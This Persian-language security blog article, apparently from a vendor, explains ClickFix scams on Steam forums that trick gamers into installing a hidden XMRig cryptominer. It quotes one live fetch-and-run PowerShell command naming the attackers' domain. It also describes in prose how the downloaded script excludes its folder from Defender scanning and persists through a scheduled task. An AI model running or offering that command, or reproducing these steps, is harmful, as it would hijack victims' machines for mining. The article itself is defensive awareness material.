امسال شاهد افزایش واقعی حملات کلیک فیکس بودهایم. این روش چنان میان مجرمان محبوب شده که بهسختی درباره یک گونه از آن مینویسیم که نوبت به پوشش گونه بعدی میرسد.
این بار، مهاجمان گیمرها را هدف گرفتهاند: روزنامهنگاران فناوری پستهایی را مشاهده کردهاند که نکات مخرب را در فرومهای استیم تبلیغ میکنند. در ادامه توضیح میدهیم این پستها چه شکلی هستند، چه بدافزاری را گسترش میدهند و چگونه میتوانید دستگاه خود را ایمن نگه دارید.
کلیک فیکس راه خود را به فرومهای استیم باز میکند
بسیاری از گیمرها برای دریافت کمک و راهنمایی در مورد موضوعاتی مانند پشت سر گذاشتن کوئستهای دشوار، افزایش سطح، به دست آوردن بهترین لوتها یا دور زدن باگها، به همبازیهای خود در فرومهای استیم مراجعه میکنند. و دقیقاً همین اعتماد به توصیههای جامعه کاربران است که مهاجمان تصمیم به سوءاستفاده از آن گرفتهاند.

حمله زمانی آغاز میشود که مجرمان به سوال کسی درباره کرش کردن بازی، گم شدن آیتمهای اینونتوری یا سایر مشکلات فنی پاسخ میدهند. آنها با نقش بازی کردن به عنوان کاربران کمککننده، پیشنهاد میدهند که PowerShell را به عنوان Administrator باز کنید و دستوری را اجرا کنید که supposedly مشکل کاربر را حل میکند.
با پنهان کردن پست خود به عنوان راهنمای عیبیابی، مهاجم مخرب پیشنهاد میدهد PowerShell را به عنوان Administrator اجرا کرده و دستوری را اجرا کنید که supposedly مشکل کاربر را حل میکند.
همانطور که حدس میزنید، اجرای دستور هیچ چیزی را حل نمیکند – بلکه فقط یک دنیا مشکل جدید باز میکند. این کل ایده پشت ClickFix است: استفاده از مهندسی اجتماعی برای فریب قربانیان تا خودشان اقدامات ناامن را انجام دهند و به کلاهبرداران آنچه نیاز دارند برای نفوذ به دستگاه را بدهند. ما قبلاً درباره ترفندهای دیگر ClickFix نوشتهایم – CAPTCHAهای جعلی، خطاهای ساختگی مرورگر و موارد دیگر – که همگی بر این اصل استوارند که قربانی را وادار کنند دستور مخرب را خودشان اجرا کند.
زیرکی استفاده از ClickFix در فرومهای استیم این است که حمله ممکن است نه تنها بازیکنی که درخواست کمک کرده، بلکه بسیاری از گیمرهای دیگری که با همان مشکل مواجه میشوند و پاسخ را از طریق جستجوی گوگل پیدا میکنند نیز فریب دهد.
واقعاً پشت دستور irm | iex چیست
قبل از اینکه وارد جزئیات شویم که مهاجمان واقعاً گیمرها را وادار به نصب چه چیزی میکنند، باید مقداری پیشزمینه فنی را پوشش دهیم. بنابراین، ابتدا پستهای فروم استیم به کاربران ناآگاه پیشنهاد میدهند دستور زیر را در PowerShell اجرا کنند:
irm msfconfig.icu | iex
برای کسی که با PowerShell آشنایی عمیق ندارد، این خط ممکن است نسبتاً بیخطر به نظر برسد – شبیه راهاندازی MSConfig، ابزار پیکربندی سیستم داخلی ویندوز، با چند پارامتر اضافی است.
اما در واقعیت، اصلاً بیخطر نیست. بیایید بررسی کنیم هر بخش از این دستور واقعاً چه کاری انجام میدهد:
- irm مخفف دستور داخلی PowerShell به نام Invoke-RestMethod است. این دستور به آدرس وب مشخصشده در ادامه خط متصل شده و دادهها را در پاسخ دریافت میکند.
- icu آن آدرس وب است – نه نام یک فایل محلی همانطور که در نگاه اول ممکن است به نظر برسد. این سرور مهاجمان است و به درخواست irm با یک اسکریپت PowerShell مخرب پاسخ میدهد.
- iex دستور داخلی دیگر PowerShell به نام Invoke-Expression است. این دستور هر آنچه را که irm از آن آدرس وب دریافت میکند، به عنوان کد PowerShell اجرا میکند.
پس از اجرا، این خط کد PowerShell یک اسکریپت را از سایت مشخصشده دانلود کرده و بلافاصله آن را اجرا میکند. همانطور که یک کاربر ردیت بهدرستی اشاره کرده، میتوانید بهطور ایمن بفهمید چه کدی واقعاً روی دستگاه شما دانلود میشود – بدون خطر اجرای آن – فقط با حذف بخش دوم، یعنی iex. بدون آن، دستور صرفاً محتوای اسکریپت را دانلود کرده و در پنجره PowerShell چاپ میکند بدون اینکه آن را اجرا کند. این به شما کد کامل و پنهاننشدهای را میدهد که از شما خواسته شده روی دستگاه خود اجرا کنید. در ادامه، بررسی میکنیم این پستگذاران کمککننده فروم استیم واقعاً سعی دارند چه چیزی را روی ماشین گیمرها نصب کنند.

یک ماینر ارز دیجیتال، نه یک ابزار بهینهسازی
مهاجمان تحقیقات خود را انجام دادهاند: اسکریپت PowerShell دانلودشده از سرور آنها بهطور متقاعدکنندهای شبیه یک ابزار بهینهسازی ویندوز عمل میکند. پس از راهاندازی، مجموعهای از اعلانها را به کاربر نشان میدهد که ادعا میکنند فایلهای موقت را پاک میکنند، کش DNS را خالی میکنند، درایورها را بهروز میکنند، دیسک را برای خطا بررسی میکنند، برنامههای استارتآپ غیرضروری را غیرفعال میکنند، سیستم را برای بدافزار اسکن میکنند، ایمیج ویندوز را تعمیر میکنند و یکپارچگی فایلهای سیستمی را تأیید میکنند.
اسکریپت جریان پیامهایی درباره وظایف بهینهسازی جعلی مختلف را نمایش میدهد تا به نظر برسد در حال انجام نگهداری مفید است.
فعالیت واقعی، در همین حین، پشت صحنه اتفاق میافتد. اسکریپت با بررسی اینکه آیا با حقوق Administrator در حال اجرا است شروع میکند. اگر چنین باشد، یک پوشه کاری پنهان در C:\Windows\Background ایجاد میکند و آن را به لیست استثناهای Microsoft Defender اضافه میکند. از آن نقطه به بعد، هر فایلی که در آن پوشه قرار گیرد، توسط آنتیویروس داخلی ویندوز اسکن نمیشود.
سپس، اسکریپت سیستم را برای مرحله بعدی حمله آماده کرده و یک فایل اجرایی را از سرور مهاجمان دانلود میکند – و آن را در همان پوشه C:\Windows\Background با نام بهظاهر قانونی system.exe ذخیره میکند.
فایل دانلودشده XMRig است، یکی از محبوبترین ابزارها برای استخراج ارز دیجیتال Monero. XMRig خود بدافزار نیست؛ یک ابزار استخراج متنباز و قانونی است. مشکل این است که مهاجمان آن را بدون اطلاع قربانیان روی کامپیوترهای آنها نصب میکنند. پس از اجرا، قدرت پردازشی دستگاه برای استخراج Monero ربوده میشود و ارز دیجیتال حاصل مستقیماً به مجرمان میرسد.
این موضوع ریگهای گیمرها را به اهدافی بهویژه جذاب تبدیل میکند: PCهای گیمینگ مدرن دارای CPU و GPU قدرتمندی هستند – دقیقاً همان نوع سختافزاری که برای استخراج ارز دیجیتال عالی است.
برای اطمینان از اینکه بدافزار پس از ریبوت باقی میماند، اسکریپت یک وظیفه جدید در Windows Task Scheduler ایجاد میکند: XMRig-{نام کامپیوتر}. از آن پس، بهطور خودکار ماینر ارز دیجیتال را هر بار که سیستم راهاندازی میشود، اجرا میکند.
چگونه دستگاه خود را از ماینرهای ارز دیجیتال و سایر بدافزارها محافظت کنید
متأسفانه، بسیاری از گیمرها تمایلی به نصب نرمافزار امنیتی – یا فعال نگه داشتن آن – روی دستگاههای خود ندارند. عامل اصلی این باور غلط پایدار است که “آنتیویروس بازی شما را کند میکند”. ما قبلاً درباره تحقیقات در این مورد در وبلاگ خود نوشتهایم و نتایج نشان داد که اجرای آنتیویروس هنگام بازی هیچ افت عملکرد قابلتوجهی ایجاد نمیکند.
اما همین موضوع را نمیتوان درباره ماینرهای ارز دیجیتال گفت – آنها قطعاً به عملکرد آسیب میزنند و علاوه بر آن، سختافزار شما را سریعتر فرسوده میکنند. پس چه کاری میتوانید انجام دهید تا PC گیمینگ و حسابهای خود را از خطر دور نگه دارید؟
- از اجرای اسکریپتهای PowerShell، Terminal یا سایر promptهای دستوری که غریبهها پیشنهاد میدهند کپی و اجرا کنید – چه در فرومها، چه در چتها یا نظرات – خودداری کنید.
- قبل از زدن Enter روی هر دستوری که کاملاً متوجه آن نیستید، بررسی کنید چه کاری انجام میدهد و پیامدهای احتمالی اجرای آن چیست.
- از یک راهحل امنیتی قابلاعتماد با حالت گیمینگ استفاده کنید که تلاشهای دانلود بدافزار را بهموقع شناسایی کرده و از اجرای آنها جلوگیری کند.
- هنگام بازی محافظت را خاموش نکنید. استفاده از راهحلی با حالت گیمینگ اختصاصی راه درست است. محصولات امنیتی کسپرسکی بهطور خودکار آن حالت را بهمحض راهاندازی یک بازی فعال میکنند و بهروزرسانیهای پایگاه داده آنتیویروس، اعلانها و اسکنهای زمانبندیشده دیسک را تا پایان بازی به تعویق میاندازند.
